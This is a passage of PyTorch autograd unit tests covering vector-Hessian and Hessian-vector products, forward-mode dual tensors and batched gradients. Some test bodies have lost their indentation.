def test_vhp_scalar(self):
    # vhp with 0-dim (scalar) inputs and with v omitted.
    def reducer(x):
        return x.sum()
    inputs = torch.rand(4, 4)
    v = torch.ones(4, 4)
    res = autogradF.vhp(reducer, inputs, v)
    self._assert_same_struct(res[1], inputs)

    inputs = torch.rand([])
    v = torch.rand([])
    res = autogradF.vhp(reducer, inputs, v)
    self._assert_same_struct(res[1], inputs)
    # v may be omitted when the input is 0-dim.
    res = autogradF.vhp(reducer, inputs)
    self._assert_same_struct(res[1], inputs)

    def bad_reducer(x):
        # Extra size-1 dims on the output are still accepted (single element).
        return x.sum().view(1, 1, 1)
    inputs = torch.rand(4, 4)
    v = torch.rand(4, 4)
    res = autogradF.vhp(bad_reducer, inputs, v)
    self._assert_same_struct(res[1], inputs)
def test_vhp_create_graph(self):
    # create_graph=True makes the vhp itself differentiable
    # (checked via gradcheck/gradgradcheck).
    def foo(a):
        return 3 * a.narrow(0, 0, 3).exp().sum()
    inputs = torch.rand(4, 4, dtype=torch.double, requires_grad=True)
    v = torch.ones(4, 4, dtype=torch.double, requires_grad=True)
    res = autogradF.vhp(foo, inputs, v, create_graph=True)
    self._assert_same_struct(res[1], inputs)
    self.assertIsNotNone(res[0].grad_fn)
    self.assertIsNotNone(res[1].grad_fn)

    gradcheck(lambda inp, v: autogradF.vhp(foo, inp, v, create_graph=True), (inputs, v))
    gradgradcheck(lambda inp, v: autogradF.vhp(foo, inp, v, create_graph=True), (inputs, v))

    def bar(a, b):
        return (a + 3 * b.narrow(0, 0, 3)).exp().sum()
    inputs = (torch.rand(3, dtype=torch.double, requires_grad=True),
              torch.rand(4, dtype=torch.double, requires_grad=True))
    v = (torch.ones(3, dtype=torch.double, requires_grad=True),
         torch.ones(4, dtype=torch.double, requires_grad=True))
    out, vhp_val = autogradF.vhp(bar, inputs, v, create_graph=True)
    self._assert_same_struct(vhp_val, inputs)
    self.assertIsNotNone(out.grad_fn)
    self.assertIsNotNone(vhp_val[0].grad_fn)
    self.assertIsNotNone(vhp_val[1].grad_fn)

    gradcheck(lambda *args: autogradF.vhp(bar, args[:2], args[2:], create_graph=True)[1], inputs + v)
    gradgradcheck(lambda *args: autogradF.vhp(bar, args[:2], args[2:], create_graph=True)[1], inputs + v)

    def foo(*args):
        # Use the vhp result inside a larger differentiable expression.
        x, y = args[:2]
        v = args[2:]

        x = x.cos()
        val, grad = autogradF.vhp(bar, (x, y), v, create_graph=True)

        return val.cos() + grad[0].cos().sum() + grad[1].cos() + x.cos().sum() + y.cos()

    gradcheck(foo, inputs + v)
    gradgradcheck(foo, inputs + v)
def test_hvp_err_check(self):
def foo(a):
return 3 * a.narrow(0, 0, 3).exp().sum()
def bar(a):
return 3 * a.narrow(0, 0, 3), "bar"
def bar2(a):
return 3 * a.narrow(0, 0, 3)
inp = torch.rand(4)
v = torch.rand(4)
res = autogradF.hvp(foo, inp, v)
with self.assertRaisesRegex(TypeError, "The inputs given to hvp must be either a Tensor"):
res = autogradF.hvp(foo, (inp, 2), v)
with self.assertRaisesRegex(TypeError, "The outputs of the user-provided function given to hvp must"):
res = autogradF.hvp(bar, inp, v)
err_msg_out = "The Tensor returned by the function given to hvp should contain a single element"
with self.assertRaisesRegex(RuntimeError, err_msg_out):
res = autogradF.hvp(bar2, inp, v)
with self.assertRaisesRegex(RuntimeError, "v has invalid size:"):
res = autogradF.hvp(foo, inp, torch.rand(5))
with self.assertRaisesRegex(TypeError, "The v given to hvp must be either a Tensor or a tuple of Tensors"):
res = autogradF.hvp(foo, inp, (v, 2))
res = autogradF.hvp(foo, inp, v)
self._assert_same_struct(res[1], inp)
def foo(a, b):
return (3 * b.narrow(0, 0, 3) * a.narrow(0, 0, 3)).sum()
inp = (torch.rand(4), torch.rand(5))
v = (torch.rand(4), torch.rand(5))
res = autogradF.hvp(foo, inp, v)
self._assert_same_struct(res[1], inp)
def test_hvp_err_check_strict(self):
    # strict=True must raise when the hvp would silently be zero;
    # strict=False returns zeros instead.
    def foo(a):
        # Output does not require gradients at all.
        return a.detach().sum()

    def bar(a):
        # Make a non-leaf Tensor that requires_grad but that is not connected to the input
        return a.long().float().requires_grad_().clone().sum()

    def bar2(a):
        # A Linear function for which the jacobian is independent of the input
        return (3 * a).sum()

    inp = torch.rand(4)
    v = torch.rand(4)
    with self.assertRaisesRegex(RuntimeError, "Output 0 of the user-provided function does not require gradients."):
        res = autogradF.hvp(foo, inp, v, strict=True)
    res = autogradF.hvp(foo, inp, v, strict=False)
    self._assert_same_struct(res[1], inp)
    self.assertEqual(res[1].abs().sum(), 0.)

    with self.assertRaisesRegex(RuntimeError, "The output of the user-provided function is independent of input 0"):
        res = autogradF.hvp(bar, inp, v, strict=True)
    res = autogradF.hvp(bar, inp, v, strict=False)
    self._assert_same_struct(res[1], inp)
    self.assertEqual(res[1].abs().sum(), 0.)

    with self.assertRaisesRegex(RuntimeError, "jacobian of the user-provided function with respect to input 0 is"):
        res = autogradF.hvp(bar2, inp, v, strict=True)
    res = autogradF.hvp(bar2, inp, v, strict=False)
    self._assert_same_struct(res[1], inp)
    self.assertEqual(res[1].abs().sum(), 0.)
def test_hvp_no_grad(self):
def reducer(x):
return x.exp().sum()
inputs = torch.rand(4, 4)
v = torch.ones(4, 4)
with torch.no_grad():
res = autogradF.hvp(reducer, inputs, v)
self.assertIsNone(res[0].grad_fn)
self.assertIsNone(res[1].grad_fn)
self.assertNotEqual(res[1], torch.zeros(4, 4))
with torch.no_grad():
res = autogradF.hvp(reducer, inputs, v, create_graph=True)
self.assertIsNotNone(res[0].grad_fn)
self.assertIsNotNone(res[1].grad_fn)
self.assertNotEqual(res[1], torch.zeros(4, 4))
def test_hvp_output(self):
    # hvp returns (func_output, hvp) with no autograd graph by default.
    def foo(a):
        return 3 * a.narrow(0, 0, 3).exp().sum()
    inputs = torch.rand(4, 4)
    v = torch.ones(4, 4)
    res = autogradF.hvp(foo, inputs, v)
    self._assert_same_struct(res[1], inputs)
    self.assertIsNone(res[0].grad_fn)
    self.assertIsNone(res[1].grad_fn)

    def bar(a, b):
        return (a + 3 * b.narrow(0, 0, 3)).exp().sum()
    inputs = (torch.rand(3), torch.rand(4))
    v = (torch.ones(3), torch.ones(4))
    out, hvp_val = autogradF.hvp(bar, inputs, v)
    self._assert_same_struct(hvp_val, inputs)
    self.assertIsNone(out.grad_fn)
    self.assertIsNone(hvp_val[0].grad_fn)
    self.assertIsNone(hvp_val[1].grad_fn)
def test_hvp_scalar(self):
    # hvp with 0-dim (scalar) inputs and with v omitted.
    def reducer(x):
        return x.exp().sum()
    inputs = torch.rand(4, 4)
    v = torch.ones(4, 4)
    res = autogradF.hvp(reducer, inputs, v)
    self._assert_same_struct(res[1], inputs)

    inputs = torch.rand([])
    v = torch.rand([])
    res = autogradF.hvp(reducer, inputs, v)
    self._assert_same_struct(res[1], inputs)
    # v may be omitted when the input is 0-dim.
    res = autogradF.hvp(reducer, inputs)
    self._assert_same_struct(res[1], inputs)

    def bad_reducer(x):
        # Extra size-1 dims on the output are still accepted (single element).
        return x.exp().sum().view(1, 1, 1)
    inputs = torch.rand(4, 4)
    v = torch.rand(4, 4)
    res = autogradF.hvp(bad_reducer, inputs, v)
    self._assert_same_struct(res[1], inputs)
def test_hvp_create_graph(self):
    # create_graph=True makes the hvp itself differentiable
    # (checked via gradcheck/gradgradcheck).
    def foo(a):
        return 3 * a.narrow(0, 0, 3).exp().sum()
    inputs = torch.rand(4, 4, dtype=torch.double, requires_grad=True)
    v = torch.ones(4, 4, dtype=torch.double, requires_grad=True)
    res = autogradF.hvp(foo, inputs, v, create_graph=True)
    self._assert_same_struct(res[1], inputs)
    self.assertIsNotNone(res[0].grad_fn)
    self.assertIsNotNone(res[1].grad_fn)

    gradcheck(lambda inp, v: autogradF.hvp(foo, inp, v, create_graph=True), (inputs, v))
    gradgradcheck(lambda inp, v: autogradF.hvp(foo, inp, v, create_graph=True), (inputs, v))

    def bar(a, b):
        return (a + 3 * b.narrow(0, 0, 3)).exp().sum()
    inputs = (torch.rand(3, dtype=torch.double, requires_grad=True),
              torch.rand(4, dtype=torch.double, requires_grad=True))
    v = (torch.ones(3, dtype=torch.double, requires_grad=True),
         torch.ones(4, dtype=torch.double, requires_grad=True))
    out, hvp_val = autogradF.hvp(bar, inputs, v, create_graph=True)
    self._assert_same_struct(hvp_val, inputs)
    self.assertIsNotNone(out.grad_fn)
    self.assertIsNotNone(hvp_val[0].grad_fn)
    self.assertIsNotNone(hvp_val[1].grad_fn)

    gradcheck(lambda *args: autogradF.hvp(bar, args[:2], args[2:], create_graph=True)[1], inputs + v)
    gradgradcheck(lambda *args: autogradF.hvp(bar, args[:2], args[2:], create_graph=True)[1], inputs + v)

    def foo(*args):
        # Use the hvp result inside a larger differentiable expression.
        x, y = args[:2]
        v = args[2:]

        x = x.cos()
        val, grad = autogradF.hvp(bar, (x, y), v, create_graph=True)

        return val.cos() + grad[0].cos().sum() + grad[1].cos() + x.cos().sum() + y.cos()

    gradcheck(foo, inputs + v)
    gradgradcheck(foo, inputs + v)
def test_jacobian_match_vjp_jvp(self):
def foo(x):
return x ** 3 + x.sum()
inputs = torch.rand(4)
v = torch.rand(4)
jac = autogradF.jacobian(foo, inputs)
jvp = autogradF.jvp(foo, inputs, v)[1]
vjp = autogradF.vjp(foo, inputs, v)[1]
self.assertEqual(jvp, torch.mm(jac, v.unsqueeze(1)).squeeze(1))
self.assertEqual(vjp, torch.mm(v.unsqueeze(0), jac).squeeze(0))
def test_hessian_match_vhp_hvp(self):
def foo(a):
return 3 * a.narrow(0, 0, 3).exp().sum()
inputs = torch.rand(4)
v = torch.rand(4)
hes = autogradF.hessian(foo, inputs)
hvp = autogradF.hvp(foo, inputs, v)[1]
vhp = autogradF.vhp(foo, inputs, v)[1]
self.assertEqual(hvp, torch.mm(hes, v.unsqueeze(1)).squeeze(1))
self.assertEqual(vhp, torch.mm(v.unsqueeze(0), hes).squeeze(0))
class TestAutogradForwardModeBatchedGrad(TestCase):
    """Checks for batched (vmap-ed) forward-mode AD tangent propagation."""

    def test_out_of_place_basic(self):
        # gradcheck with both batched backward and batched forward grads
        # enabled on simple out-of-place ops.
        a = torch.rand(4, 4, dtype=torch.double, requires_grad=True)
        b = torch.rand(4, 4, dtype=torch.double, requires_grad=True)
        self.assertTrue(gradcheck(torch.sin, a, check_forward_ad=True, check_batched_grad=True,
                                  check_batched_forward_grad=True))
        self.assertTrue(gradcheck(torch.add, (a, b), check_forward_ad=True, check_batched_grad=True,
                                  check_batched_forward_grad=True))

    def test_out_of_place_not_same_layout(self):
        # When input and tangent layouts differ, vmap cannot reuse the
        # provided tangent tensor as-is.
        input = torch.zeros([2, 2]).transpose(0, 1)
        tangent = torch.zeros([2, 2, 2])

        def jvp(tangent):
            with fwAD.dual_level():
                x = fwAD.make_dual(input, tangent)
                return fwAD.unpack_dual(x)[1]
        x_tangent = torch._vmap_internals._vmap(jvp, 0, 0)(tangent)

        self.assertIsNot(x_tangent, tangent)

    def test_inplace_on_view_same_layout(self):
        input = torch.zeros([2, 2])
        tangent = torch.zeros([2, 2, 2])
        base = torch.zeros([2, 2])
        view = base.view_as(base)

        def jvp(tangent):
            with fwAD.dual_level():
                x = fwAD.make_dual(input, tangent)
                view.copy_(x)
                return fwAD.unpack_dual(x)[1], fwAD.unpack_dual(view)[1], fwAD.unpack_dual(view._base)[1]
        x_tangent, view_tangent, base_tangent = torch._vmap_internals._vmap(jvp, 0, 0)(tangent)

        self.assertFalse(view_tangent._is_view())  # Optimization to share the same tensor!
        self.assertIs(view_tangent, base_tangent)
        self.assertIs(x_tangent, tangent)
        self.assertIs(view_tangent, tangent)

    def test_inplace_on_view_not_same_layout(self):
        input = torch.zeros([2, 2])
        tangent = torch.zeros([2, 2, 2])
        view = torch.zeros([2, 2]).transpose(0, 1)

        def jvp(tangent):
            with fwAD.dual_level():
                x = fwAD.make_dual(input, tangent)
                view.copy_(x)
                return fwAD.unpack_dual(x)[1], fwAD.unpack_dual(view)[1], fwAD.unpack_dual(view._base)[1]
        x_tangent, view_tangent, base_tangent = torch._vmap_internals._vmap(jvp, 0, 0)(tangent)

        # With a different layout the view tangent must be a true view of the
        # base tangent, not the input tangent itself.
        self.assertIs(view_tangent._base, base_tangent)
        self.assertIs(x_tangent, tangent)
        self.assertIsNot(view_tangent, tangent)
class TestAutogradForwardMode(TestCase):
    """Tests for forward-mode AD mechanics: dual-level lifecycle,
    packing/unpacking of dual tensors, view/inplace interactions and cleanup."""

    def tearDown(self):
        # Ensure that a failing test won't make others fail
        while fwAD._current_level >= 0:
            fwAD.exit_dual_level()

        super().tearDown()

    def test_forward_level_cleanup(self):
        def get_tensor_and_weak_ref():
            # Create a new Tensor and weak reference
            t = torch.rand(2, requires_grad=True)
            return t, torch._C._WeakTensorRef(t)

        # Sanity check that the helper function works as expected
        t, t_ref = get_tensor_and_weak_ref()
        self.assertFalse(t_ref.expired())

        del t
        self.assertTrue(t_ref.expired())

        # Main test code
        foo = torch.rand(2)

        with fwAD.dual_level():
            tangent, tangent_ref = get_tensor_and_weak_ref()
            self.assertFalse(tangent_ref.expired())

            dual = fwAD.make_dual(foo, tangent)
            self.assertFalse(tangent_ref.expired())

            # Make sure that the tangent we provided has been re-used as is
            self.assertTrue(fwAD.unpack_dual(dual)[1] is tangent)

            # Make sure that dual is keeping the tangent alive
            del tangent
            self.assertFalse(tangent_ref.expired())

            # Make sure that the dual level does not keep the c++
            # version of the tangent alive
            del dual
            self.assertTrue(tangent_ref.expired())

    def test_size_check(self):
        foo = torch.rand(2)
        tangent = torch.rand(3)

        with fwAD.dual_level():
            with self.assertRaisesRegex(RuntimeError, "Trying to set a forward gradient that has a different size"):
                dual = fwAD.make_dual(foo, tangent)

            # A tangent slice with the right size is accepted.
            dual = fwAD.make_dual(foo, tangent[1:])

    # The following test functions want to ensure all the following behaviors:
    #   - Ensure that default level system in the python binding works
    #   - Ensure that only level 0 exists and nesting is properly disabled
    #   - Ensure that printing works fine
    #   - Ensure that basic packing/unpacking works
    #   - Ensure that advanced packing/unpacking works
    #     - For memory / version counter share
    #     - For backward AD (regular ops)
    #   - Ensure that view + inplace for both modes work fine
    #   - Ensure we do proper cleanup on exit of a level

    def test_default_level(self):
        foo = torch.rand(2)
        bar = torch.rand(2)

        with fwAD.dual_level():
            baz = fwAD.make_dual(foo, bar)
            baz_primal, baz_tangent = fwAD.unpack_dual(baz)
            self.assertEqual(baz_primal, foo)
            # We don't actually need to enforce that these two are the exact same python
            # object, feel free to relax in the future
            self.assertIs(baz_tangent, bar)

        # Outside the level, unpacking yields no tangent.
        baz_primal, baz_tangent = fwAD.unpack_dual(baz)
        self.assertEqual(baz_primal, foo)
        self.assertEqual(baz_tangent, None)

    def test_nested_level(self):
        with fwAD.dual_level() as level:
            # For now only level 0 exists
            self.assertEqual(level, 0)

        with fwAD.dual_level():
            with self.assertRaisesRegex(RuntimeError, "Nested forward mode AD is not supported at the moment"):
                nest_level = fwAD.enter_dual_level()

    def test_set_fw_grad_having_own_fw_grad_at_same_level(self):
        foo = torch.rand(2)
        bar = torch.rand(2)
        baz = torch.rand(2)

        with fwAD.dual_level():
            dual = fwAD.make_dual(foo, bar)
            # A dual tensor cannot itself be used as the tangent at the same level.
            with self.assertRaisesRegex(RuntimeError, "has a forward gradient at the same level"):
                fwAD.make_dual(baz, dual)

    def test_make_dual_inference_tensor_in_inference_mode(self):
        with torch.inference_mode():
            foo = torch.rand(2)
            bar = torch.rand(2)
            foo_copy = foo.clone()

        with fwAD.dual_level():
            dual = fwAD.make_dual(foo, bar)
            # Inference tensors are not tracked as views.
            self.assertFalse(dual._is_view())

            dual += 1
            # The inplace update writes through to the inference-mode primal.
            self.assertFalse(torch.allclose(foo, foo_copy))

    def test_make_dual_torch_dispatch(self):
        counter = [0]

        class MySubclass(torch.Tensor):
            def __new__(cls, data=None):
                return torch.Tensor._make_subclass(cls, data)

            @classmethod
            def __torch_dispatch__(cls, func, types, args=(), kwargs=None):
                # make_dual is expected to alias its primal argument exactly once.
                if func == torch.ops.aten.alias:
                    counter[0] += 1

                    with no_dispatch():
                        return MySubclass(torch.ops.aten.alias(*args))

                with no_dispatch():
                    return func(*args, **kwargs)

        a = torch.tensor(1.)
        s = MySubclass(a)

        with fwAD.dual_level():
            # Subclass as primal: alias goes through __torch_dispatch__.
            fwAD.make_dual(s, torch.rand_like(s))
            self.assertEqual(counter[0], 1)

            # Subclass as tangent: alias dispatched as well.
            fwAD.make_dual(torch.rand_like(s), s)
            self.assertEqual(counter[0], 2)

    def test_print(self):
        with fwAD.dual_level() as level:
            a = torch.rand(3)
            self.assertFalse("tangent=" in str(a))

            b = fwAD.make_dual(a, torch.rand(3))
            self.assertFalse("tangent=" in str(a))
            self.assertTrue("tangent=" in str(b))

            b_primal, b_tangent = fwAD.unpack_dual(b)
            self.assertFalse("tangent=" in str(b_primal))
            self.assertFalse("tangent=" in str(b_tangent))

    def test_basic_packing_unpacking(self):
        foo = torch.rand(2)
        bar = torch.rand(2)

        with fwAD.dual_level():
            baz = fwAD.make_dual(foo, bar)
            baz_primal, baz_tangent = fwAD.unpack_dual(baz)
            self.assertEqual(baz_primal, foo)
            self.assertIs(baz_tangent, bar)

            # Check unpacked dual is returned as a named tuple
            # NB: Every invocation of unpack_dual returns a new tensor view
            self.assertIsNot(baz_primal, fwAD.unpack_dual(baz).primal)
            self.assertEqual(baz_primal, fwAD.unpack_dual(baz).primal)
            self.assertIs(baz_tangent, fwAD.unpack_dual(baz).tangent)

            # Check that packing/unpacking did not change the input
            foo_primal, foo_tangent = fwAD.unpack_dual(foo)
            self.assertEqual(foo_primal, foo)
            self.assertIsNone(foo_tangent)

    def test_advanced_packing_unpacking(self):
        foo = torch.rand(2)
        bar = torch.ones(2)

        # Memory and version counter check
        with fwAD.dual_level():
            dual = fwAD.make_dual(foo, bar)

            # Ensure that they are sharing memory and version counter
            self.assertEqual(dual.storage().data_ptr(), foo.storage().data_ptr())

            # Ensure we properly share the version counter
            self.assertEqual(foo._version, dual._version)
            foo.add_(1)
            self.assertEqual(foo._version, dual._version)

            # Unpacking should only create aliases as well
            dual_primal, dual_tangent = fwAD.unpack_dual(dual)
            self.assertEqual(dual_primal.storage().data_ptr(), foo.storage().data_ptr())
            self.assertEqual(dual_tangent.storage().data_ptr(), bar.storage().data_ptr())
            # And the tangent is actually re-used as-is so it is still the same Tensor
            self.assertIs(dual_tangent, bar)

            # Ensure we properly share the version counter
            self.assertEqual(foo._version, dual_primal._version)
            foo.add_(1)
            self.assertEqual(foo._version, dual_primal._version)
            self.assertEqual(bar._version, dual_tangent._version)
            bar.add_(1)
            self.assertEqual(bar._version, dual_tangent._version)

        # backward mode check
        with fwAD.dual_level():
            foo.requires_grad_()
            bar.requires_grad_()

            # Check that backward gradients properly propagates through packing/unpacking
            dual = fwAD.make_dual(foo, bar)
            p, t = fwAD.unpack_dual(dual)

            gfoo, gbar = torch.autograd.grad(p.sum(), (foo, bar), retain_graph=True, allow_unused=True)
            self.assertEqual(gfoo, torch.ones_like(foo))
            self.assertIsNone(gbar)

            gfoo, gbar = torch.autograd.grad(t.sum(), (foo, bar), retain_graph=True, allow_unused=True)
            self.assertIsNone(gfoo)
            self.assertEqual(gbar, torch.ones_like(bar))

            # Check that forward gradients are impacted by detach()
            detached_dual = dual.detach()
            out = detached_dual * 2
            p, t = fwAD.unpack_dual(out)
            self.assertFalse(p.requires_grad)
            self.assertEqual(p, foo * 2)
            self.assertIsNone(t)

            # Check that forward gradients are not impacted by no_grad
            with torch.no_grad():
                out = dual * 3
            p, t = fwAD.unpack_dual(out)
            self.assertFalse(p.requires_grad)
            self.assertFalse(t.requires_grad)
            self.assertEqual(p, foo * 3)
            self.assertEqual(t, bar * 3)

            # Check that forward gradients are not impacted by inplace detach
            dual = dual.clone()
            dual.detach_()
            out = dual * 2
            p, t = fwAD.unpack_dual(out)
            self.assertFalse(p.requires_grad)
            self.assertEqual(p, foo * 2)
            self.assertIsNone(t)

    def test_view_inplace_non_differentiable_views(self):
        original_foo = torch.rand(2, dtype=torch.double)
        original_bar = torch.ones(2, dtype=torch.double)

        # Do clones to be able to compare the values updated inplace
        # with the original content of these Tensors
        foo = original_foo.clone()
        bar = original_bar.clone()

        with fwAD.dual_level():
            # Note that in this test, we use "update" to mean computing the right tangent for the dual
            # All the inplace operations here are expected to update the primal value of the Tensors but
            # not always their tangents.
            # Also all mentions of "non differentiable view" here means non forward differentiable view
            # unless specified otherwise.
            # See note [Forward Grad View/inplace] for more details on how these views work.

            # Check that inplace ops do not update non-differentiable views
            # Non differentiable view
            dual = fwAD.make_dual(foo, bar)
            dual *= 2
            # Check that non differentiable view's tangent was not updated
            self.assertIsNone(fwAD.unpack_dual(foo)[1])
            # Check that the computed result is correct
            self.assertEqual(bar, original_bar * 2)
            self.assertEqual(fwAD.unpack_dual(dual)[1], original_bar * 2)
            self.assertEqual(foo, original_foo * 2)
            self.assertEqual(fwAD.unpack_dual(dual)[0], original_foo * 2)
            # Other non differentiable view
            dual_primal, dual_tangent = fwAD.unpack_dual(dual)
            self.assertIsNone(fwAD.unpack_dual(dual_primal)[1])
            self.assertIsNone(fwAD.unpack_dual(dual_tangent)[1])
            dual_primal *= 2
            # Ensure dual's tangent did not change
            self.assertEqual(fwAD.unpack_dual(dual)[0], original_foo * 4)
            self.assertEqual(fwAD.unpack_dual(dual)[1], original_bar * 2)
            dual_tangent *= 2
            # Ensure dual's primal did not change
            self.assertEqual(fwAD.unpack_dual(dual)[0], original_foo * 4)
            self.assertEqual(fwAD.unpack_dual(dual)[1], original_bar * 4)

    def test_view_inplace_differentiable_views(self):
        original_foo = torch.rand(2)
        original_bar = torch.ones(2)

        # Do clones to be able to compare the values updated inplace
        # with the original content of these Tensors
        foo = original_foo.clone()
        bar = original_bar.clone()

        with fwAD.dual_level():
            # Check that inplace ops do update differentiable view but stop at non differentiable ones
            # A non differentiable view
            dual = fwAD.make_dual(foo, bar)
            # A differentiable view
            view = dual.narrow(0, 0, 1)
            view *= 2
            # Check that non differentiable view was not updated
            self.assertIsNone(fwAD.unpack_dual(foo)[1])
            # Check that differentiable view was updated
            self.assertEqual(fwAD.unpack_dual(dual)[1], torch.tensor([2., 1.]))
            self.assertEqual(fwAD.unpack_dual(view)[1], torch.tensor([2.]))

            # Check that we track differentiable view even for Tensors that are not dual
            baz = torch.rand(2)
            baz += dual
            self.assertEqual(fwAD.unpack_dual(baz)[1], fwAD.unpack_dual(dual)[1])

            # Updates on view should as well
            baz = torch.rand(2)
            baz[0] = dual[0]
            self.assertEqual(fwAD.unpack_dual(baz)[1][0], fwAD.unpack_dual(dual)[1][0])
            # Unused values get a gradient of 0
            self.assertEqual(fwAD.unpack_dual(baz)[1][1], 0.)

            # Check that forward non-differentiable views do prevent gradient update
            baz = torch.rand(2)
            view = baz.detach()
            view += dual
            self.assertIsNone(fwAD.unpack_dual(baz)[1])

    def test_view_inplace_always_creates_a_view(self):
        # See https://github.com/pytorch/pytorch/issues/67800
        # The codepath may depend on the op. At the time writing, when self is not a dual tensor
        # the resulting forward grad for self for...
        # - add_ has the same layout as self
        # - mul_ has the same layout as other
        # This is kind of fragile because the above depends on how the forward grad expression
        # is written. For add and mul at least, the output inherits the layout of LHS.
        # We want to handle at least these two cases.
        inplace_binary_ops = (  # Add more to this list?
            lambda x, y: x.add_(y),
            lambda x, y: x.mul_(y),
            lambda x, y: x.copy_(y),
        )

        for inplace_binary_op in inplace_binary_ops:
            base = torch.randn(2, 2)
            view = base.transpose(0, 1)

            primal = torch.randn(2, 2)
            tangent = torch.randn(2, 2)

            with fwAD.dual_level():
                dual = fwAD.make_dual(primal, tangent)
                inplace_binary_op(view, dual)

                # Verify that a view relationship is created for both the primal and tangent
                p, t = fwAD.unpack_dual(base)
                p_clone = p.clone()
                t_clone = t.clone()
                view *= 2
                p, t = fwAD.unpack_dual(base)

                self.assertTrue(torch.allclose(p_clone * 2, p))
                self.assertTrue(torch.allclose(t_clone * 2, t))

    def test_grad_cleanup(self):
        foo = torch.rand(2)
        bar = torch.rand(2)
        baz = torch.rand(2)

        with fwAD.dual_level():
            dual = fwAD.make_dual(foo, bar)
            self.assertIsNone(fwAD.unpack_dual(foo)[1])
            self.assertIs(fwAD.unpack_dual(dual)[1], bar)

        # Exiting the level clears forward gradients.
        self.assertIsNone(fwAD.unpack_dual(dual)[1])

        with fwAD.dual_level():
            self.assertIsNone(fwAD.unpack_dual(foo)[1])
            new_dual = fwAD.make_dual(foo, baz)

            dual_primal, dual_tangent = fwAD.unpack_dual(dual)
            new_dual_primal, new_dual_tangent = fwAD.unpack_dual(new_dual)
            self.assertEqual(dual_primal, new_dual_primal)
            self.assertIsNone(dual_tangent)
            self.assertEqual(new_dual_tangent, baz)

    def test_detach_view_tracking(self):
        # Default detach is both forward and backward non-differentiable
        foo = torch.rand(2)
        foo_weak = torch._C._WeakTensorRef(foo)

        out = foo.detach()

        del foo
        self.assertTrue(foo_weak.expired())

    def test_out_variant(self):
        # out= variants are rejected when a dual tensor is involved.
        with fwAD.dual_level():
            foo = fwAD.make_dual(torch.rand(2), torch.rand(2))
            bar = torch.rand(2)

            with self.assertRaisesRegex(RuntimeError, "out= function"):
                torch.add(bar, bar, out=foo)

            with self.assertRaisesRegex(RuntimeError, "out= function"):
                torch.add(foo, bar, out=bar)

    def test_non_differentiable(self):
        with fwAD.dual_level():
            foo = fwAD.make_dual(torch.rand(2), torch.rand(2))
            bar = torch.rand(2)

            # No differentiable outputs, shouldn't error
            eq = foo == bar

    def test_create_new_zeros_with_same_meta(self):
        new_zeroes_fn = torch.ops.aten._new_zeros_with_same_feature_meta

        def check(a, b):
            def assert_same_meta(t, target):
                for num_bdim in range(t.dim()):
                    result = new_zeroes_fn(t, target, self_num_batch_dims=num_bdim)

                    self.assertEqual(result.dim(), target.dim() + num_bdim)

                    # Check size/strides match for feature dims only
                    for i in range(num_bdim, result.dim()):
                        self.assertEqual(result.size()[i], target.size()[i - num_bdim])
                        self.assertEqual(result.stride()[i], target.stride()[i - num_bdim])

                    # Check that we generate strides reasonably
                    if target.is_contiguous():
                        self.assertTrue(result.is_contiguous())

                    self.assertEqual(result.storage_offset(), target.storage_offset())

                    prod_of_t_bdims = reduce(operator.mul, t.size()[:num_bdim], 1)
                    self.assertEqual(len(result.storage()), len(target.storage()) * prod_of_t_bdims)

                    # TensorOptions is same
                    self.assertEqual(result.dtype, target.dtype)

            assert_same_meta(a, b)
            assert_same_meta(b, a)

        a = torch.randn(5, dtype=torch.float)
        b = torch.randn(2, 3, 4, dtype=torch.double)
        check(a, b)

        # non-contiguous case
        a = torch.randn(2, 3, 4).transpose(0, 1).contiguous().transpose(0, 1)
        b = torch.randn(2, 3, 4)
        check(a, b)

        a = torch.randn(5).narrow(0, 1, 2)
        b = torch.randn(2)
        check(a, b)

        # tensor is not a view, but still does not index entirety of storage
        a = torch.randn(5).resize_(4)
        b = torch.randn(4)
        check(a, b)

        # Zero-numel tensors
        a = torch.randn(1, 0, 2)
        b = torch.randn(1, 2)
        check(a, b)

        # Scalar tensor
        a = torch.tensor(1.)
        b = torch.randn(1, 2)
        check(a, b)

    def test_backward_graph_destruction(self):
        def fn():
            a = torch.rand(10, requires_grad=True)

            da = fwAD.make_dual(torch.rand_like(a), a)

            # Create an object with a c++ cycle as:
            # db -> AutogradMeta -> ForwardGrad -> db's grad
            # db's grad -> AutogradMeta -> MulBackward
            # MulBackward -> SavedVariable -> db
            db = da.exp()

        with fwAD.dual_level():
            fn()
        # This test make sure that we don't deadlock on exit of this
        # context manager. If you do, there is something wrong with the
        # locking of the forward ad level most likely
# Generic device type autograd tests.
class TestAutogradDeviceType(TestCase):
def test_min_max_median_backprops_to_all_values(self, device):
    # When several entries are tied for the min/max/median (or are all NaN),
    # the gradient must be split evenly across all of them (1/3 each here).
    for f in [torch.min, torch.max, torch.median, torch.nanmedian]:
        x1 = torch.tensor([1., 0., 1., 0., 1., 0.], device=device, requires_grad=True)
        # NOTE(review): x2 is created without device= — presumably the all-NaN
        # case is deliberately exercised on the default device; confirm.
        x2 = torch.tensor([float('nan'), float('nan'), float('nan')], requires_grad=True)
        for x in [x1, x2]:
            y = f(x)
            y.backward()
            self.assertEqual(x.grad.sum(), 1.)
            self.assertEqual((x.grad == 1 / 3).sum(), 3)
def test_parameter_resize(self, device):
    # Shrinking a Parameter's storage via set_() under no_grad must not
    # break subsequent autograd use of the parameter.
    asd = torch.nn.Parameter(torch.ones(16, dtype=torch.double, device=device))

    for i in range(2):
        with torch.no_grad():
            asd.set_(asd[1:])
            asd.grad = None

        m = torch.cat((asd, asd))
        m.sum().backward()
@dtypes(torch.double, torch.cdouble)
def test_sparse_ctor_getter_backward(self, device, dtype):
    # See NOTE [ Sparse: autograd and API ] on the expected behavior of this test
    def _test(size, sparse_dim, nnz, device):
        # Build random integer indices within `size` for the sparse dims.
        v_size = [nnz] + list(size[sparse_dim:])
        i = torch.rand(sparse_dim, nnz)
        i.mul_(torch.tensor(size[:sparse_dim]).unsqueeze(1).to(i))
        i = i.to(torch.long)

        inp = torch.randn(v_size, dtype=torch.double, device=device, requires_grad=True)
        other = self.genSparseTensor(size, sparse_dim, nnz, is_uncoalesced=True, device=device,
                                     dtype=dtype)[0]

        def fn(v):
            # Round-trip through sparse construction, coalescing and values().
            x = torch.sparse_coo_tensor(i, v, size, dtype=dtype, device=device)
            y = (x + other).coalesce()
            yv = y.values()
            new_v = yv.tanh()
            z = torch.sparse_coo_tensor(y.indices(), new_v, y.size())
            return z.coalesce().values()

        gradcheck(fn, (inp,), check_batched_grad=False)
        # FIXME: make gradgradcheck work.
